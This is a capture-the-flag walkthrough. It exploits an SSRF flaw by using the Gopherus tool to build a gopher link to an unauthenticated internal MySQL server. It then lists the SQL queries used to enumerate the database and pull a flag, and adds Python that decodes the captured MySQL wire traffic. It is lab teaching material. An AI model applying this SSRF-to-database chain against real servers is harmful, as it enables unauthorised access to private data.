![43e8a55cc6906b58027ff646aef7d714.png](0ebf6e35dc0d426a8c77cfb6e54397ab.png)

While logged in as admin, we see a **messages** button. Clicking it reveals:

![7570a88f3bf06f4f201d61c1ec8ca6b2.png](e34acd03d04343918d1299528f90f1dc.png)

So `brian` has a **mysql** database that isn't password protected. Neat. The server configuration confirms the existence of a **mysql** server:

![3afe5fdb3181f7c575e4647dd7c0eca3.png](cebf0c3f22874be7afc5283c2796403b.png)

Things we know:

1. brian has a mysql server that doesn't require a password
2. the mysql server is at `10.10.10.53:3306`
3. The server is vulnerable to **SSRF**

There's a tool called **gopherus** that is built for attacking things like **mysql** using **SSRF**. It will build a **gopher** link for us to use.

https://github.com/tarunkant/Gopherus

`gopherus --exploit mysql`

![091fd0f0915d6adf7185a3854a73c72a.png](81b65e0a210e44529e2779fe63818ed9.png)

Adding that **gopher link** to our **CSV** and editing the **url** to match what it says in the config file (10.10.10.53), we get back:

```
Log:
Resp: shipmentID,arrival_date,catalogURL
Resp: SgAAAAo4LjAuMjUAvigAAF4WFGkVYDhpAP///wIA/88VAAAAAAAAAAAAAAdFXx5xdG0xI2grIwBteXNxbF9uYXRpdmVfcGFzc3dvcmQABwAAAgAAAAIAAAABAAABATYAAAIDZGVmAAhTQ0hFTUFUQQhzY2hlbWF0YQhEYXRhYmFzZQhEYXRhYmFzZQwhAMAAAAD9gRAAAAATAAADEmluZm9ybWF0aW9uX3NjaGVtYQgAAAQHd2Vibm90ZQcAAAX+AAAiAAAA
invalid format! Cannot import records!
```

More base64:

![172daae54d361ddd734d2bee4d2a207e.png](8218a9cd4c09411880759fd12b7de1c6.png)

Looks like there's a database called `webnote`.

Using **gopherus** to issue these commands, we can enumerate the database:

1. `show databases;` - reveals the database `webnote`
2. `use webnote; show tables;` - reveals the table `settings`
3. `use webnote; select column_name from information_schema.columns where table_schema = 'webnote' and table_name = 'settings';` - reveals the columns `apikey` and `note`
4. `use webnote; select note from settings;` - gives the flag

![5e3131c1295e9cd09e49d84edb86b54b.png](10b86198686349759874cc4dc5753cf9.png)

`flag{bu7_50m37im3s_Y0u_N33d_i11usi0n}`
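Added example, not part of the original write-up: the second `Resp:` line in the import log above is the raw MySQL wire traffic, base64-encoded, and this Python code splits it into protocol packets and reads the server version and result rows instead of eyeballing the decoded bytes. It assumes a single statement that returns a result set (as with `show databases;`) and no EOF packet between the column definitions and the rows (`CLIENT_DEPRECATE_EOF`), which is what this capture contains; the function names are my own.

```python
import base64

# The second "Resp:" line from the import log above, verbatim.
RESP_B64 = (
    "SgAAAAo4LjAuMjUAvigAAF4WFGkVYDhpAP///wIA/88V"
    "AAAAAAAAAAAAAAdFXx5xdG0xI2grIwBteXNxbF9uYXRpdmVfcGFzc3dvcmQA"
    "BwAAAgAAAAIAAAABAAABATYAAAIDZGVmAAhTQ0hFTUFUQQhzY2hlbWF0YQhEYXRhYmFzZQhEYXRhYmFzZQwh"
    "AMAAAAD9gRAAAAATAAADEmluZm9ybWF0aW9uX3NjaGVtYQgAAAQHd2Vibm90ZQcAAAX+AAAiAAAA"
)

def split_packets(buf):
    """MySQL framing: 3-byte little-endian length, 1-byte sequence id, payload."""
    out, i = [], 0
    while i + 4 <= len(buf):
        n = int.from_bytes(buf[i:i + 3], "little")
        out.append((buf[i + 3], buf[i + 4:i + 4 + n]))
        i += 4 + n
    return out

def lenenc(p, i):
    """Length-encoded integer at p[i] -> (value, next offset); 0xFB is NULL."""
    if p[i] <= 0xFB:
        return (None if p[i] == 0xFB else p[i]), i + 1
    w = {0xFC: 2, 0xFD: 3, 0xFE: 8}[p[i]]
    return int.from_bytes(p[i + 1:i + 1 + w], "little"), i + 1 + w

def parse_row(p):
    """Text-protocol row: one length-encoded string (or NULL) per column."""
    vals, i = [], 0
    while i < len(p):
        n, i = lenenc(p, i)
        vals.append(None if n is None else p[i:i + n].decode("utf-8", "replace"))
        i += n or 0
    return vals

def decode_response(b64):
    pkts = split_packets(base64.b64decode(b64))
    hello = pkts[0][1]  # protocol version byte, then NUL-terminated server version
    version = hello[1:hello.index(0, 1)].decode()
    # Sequence ids restart per command, so the query reply starts at id 1.
    k = next(i for i, (seq, _) in enumerate(pkts) if i and seq == 1)
    ncols, _ = lenenc(pkts[k][1], 0)
    rows = []
    for _, r in pkts[k + 1 + ncols:]:  # skip the column definitions
        if r[0] == 0xFE and len(r) < 9:  # terminating OK/EOF packet
            break
        rows.append(parse_row(r))
    return version, rows
```

`decode_response(RESP_B64)` returns the server version `8.0.25` and the two rows `information_schema` and `webnote`, matching what the decoded screenshot shows.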